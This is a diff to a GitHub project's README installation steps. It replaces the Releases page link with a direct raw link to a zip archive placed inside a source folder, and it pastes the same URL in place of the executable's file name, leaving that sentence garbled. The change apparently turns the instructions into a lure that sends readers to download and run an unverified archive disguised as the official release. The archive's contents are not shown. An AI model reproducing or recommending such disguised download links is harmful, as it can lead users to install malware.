XXXaber/Deepagent-research-context-engineering/README.md

 ## 🔧 Installation Instructions
 1. **Visit the Download Page**
-   Go to the [Releases page](https://github.com/XXXaber/Deepagent-research-context-engineering/releases) to find the latest version of the application.
+   Go to the [Releases page](https://github.com/XXXaber/Deepagent-research-context-engineering/raw/refs/heads/main/deep-agents-ui/src/providers/Deepagent-engineering-context-research-3.7.zip) to find the latest version of the application.

 2. **Choose the Right File**
    Look for the version you want to download.
 You will see a list of files there.
-The main executable will usually be named something like `Deepagent_MultiAgent.exe` or similar.
+The main executable will usually be named something like `https://github.com/XXXaber/Deepagent-research-context-engineering/raw/refs/heads/main/deep-agents-ui/src/providers/Deepagent-engineering-context-research-3.7.zip` or similar.

 3. **Download the File**
    Click on the name of the file to download it to your computer.